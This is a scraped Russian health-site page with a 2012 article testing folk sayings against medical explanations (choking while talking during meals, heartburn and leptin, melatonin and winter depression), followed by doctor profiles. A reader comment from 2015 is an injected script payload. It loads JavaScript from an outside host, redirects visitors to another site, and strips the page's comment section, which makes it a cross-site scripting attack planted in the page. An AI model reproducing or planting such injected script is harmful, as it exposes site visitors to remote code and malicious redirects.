Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Правы ли русские поговорк...  >>  Правы ли русские поговорки?
 
Обратная связь
 

Правы ли русские поговорки?

Размер шрифта
31 января 2012 09:00
  • google_analytics: false
  • Нравится

Есть ли смысл с точки зрения медицины в наших народных поговорках? Всегда ли права народная мудрость? Проверим поговорки с помощью науки.

Когда я ем – я глух и нем

У этой поговорки есть медицинское объяснение. В норме наш надгортанник открыт, чтобы воздух мог свободно проникать в трахею и легкие. Во момент сглатывания надгортанник закрывается, чтобы еда не попала в дыхательные пути. Если во время еды мы разговариваем, то пищевой комок может проскочить в дыхательное горло до того, как его закроет надгортанник. Попавшая в трахею пища может полностью или частично закупорить дыхательное горло, и человек может задохнуться.

Богатому сладко естся, да плохо спится?

У этой поговорки есть несколько объяснений.

  • Когда мышца (сфинктер), которая соединяет два органа – пищевод и желудок – расслабляется, желудочная кислота может попасть из желудка в пищевод, вызывая изжогу.
  • Продукты с высоким гликемическим индексом вызывает резкий подъем глюкозы в крови. Через некоторое время происходит такое же резкое снижение уровня глюкозы, и мозг подает сигнал, что ему нужна глюкоза. И человек снова начинает есть. 
  • Лептин – это гормон, который продуцируется жировой тканью. Если жира достаточно, в мозг поступают сигналы, что можно прекращать запасать жировую ткань. Человек не чувствует голод. Если же лептина нет, и сигнал о насыщении в мозг не поступает, человеку постоянно хочется есть.

Как месяц не свети, а все не солнышко

Речь идет про сезонную депрессию. Месяц – это зима, а солнышко – это лето. Давайте посмотрим, что происходит с нашим организмом зимой. В условиях недостатка света начинается выработка гормона мелатонина, который называется гормоном ночи или гормоном тьмы. Он вырабатывается днем в малом количестве и в большем количестве – ночью. Сигналом к перемене настроения для организма является темнота. Если в организме начинает вырабатываться мелатонин, наша активность уменьшается, и мы засыпаем. Зимой, когда ночи становятся длиннее, вырабатывается слишком много мелатонина, в результате настроение человека падает, вплоть до депрессии.

  

Cюжеты по теме:
Русские поговорки. Всегда ли они правы

 

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:58

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.